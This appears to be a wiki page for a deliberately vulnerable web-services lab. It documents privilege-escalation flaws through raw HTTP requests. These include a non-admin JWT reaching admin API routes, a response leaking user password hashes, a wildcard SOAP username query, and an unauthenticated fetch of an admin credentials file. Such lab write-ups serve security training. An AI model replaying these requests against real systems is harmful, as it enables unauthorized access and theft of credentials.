
Vertical Access Control

Sam Sanoop edited this page Dec 28, 2020 · 3 revisions

Introduction

Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access.

Details

Multiple API calls that should only be available to an admin user within the admin area can be made by a user without admin privileges.

  • sysinfo API call within the Admin area

GET /api/v2/sysinfo/uname HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDk5MTM4LCJleHAiOjE2MDkyNzE5MzgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.wcQvzhGMkdqcL1VZTlofzfJDHTsUni34C660F2VvNO8
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://dvws.local/admin.html

  • User API call (hidden route) which should only be accessible to an admin user

GET /api/v2/users/ HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDk5MTM4LCJleHAiOjE2MDkyNzE5MzgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.wcQvzhGMkdqcL1VZTlofzfJDHTsUni34C660F2VvNO8
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://dvws.local/admin.html

HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-U21Rzwqx2eclXLDMAAfH+1UjAsM"
Date: Sun, 27 Dec 2020 20:06:53 GMT
Connection: close

{"status":200,"error":null,"result":[{"admin":true,"_id":"5fe8e39efcabaf77ecb41eb4","username":"admin","password":"$2b$10$vvkGUd4nUXoB7E1eHXjAYeTzmnBEyCFoQP623GikMla994eQ0Qp26","__v":0},{"admin":false,"_id":"5fe8e39efcabaf77ecb41eb5","username":"test","password":"$2b$10$VHm5/Ze62acPOQWXf7GkJuOZ0rglYAY.yAXJpxQw5as7kxrPb20L.","__v":0}]}

Further, the following two requests within the Admin area are accessible unauthenticated:

POST /dvwsuserservice HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIiwidXNlcjphZG1pbiJdLCJpYXQiOjE2MDkwOTg1MzYsImV4cCI6MTYwOTI3MTMzNiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.Nc2eb_QabrG9gYibr5ekm_TaVwlnoWHDzfp9pDt8C1k
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 457
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/admin.html

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <username xsi:type="xsd:string">*</username>
      </urn:Username>
   </soapenv:Body>
</soapenv:Envelope>

GET /uploads/admin/creds.xml HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

References
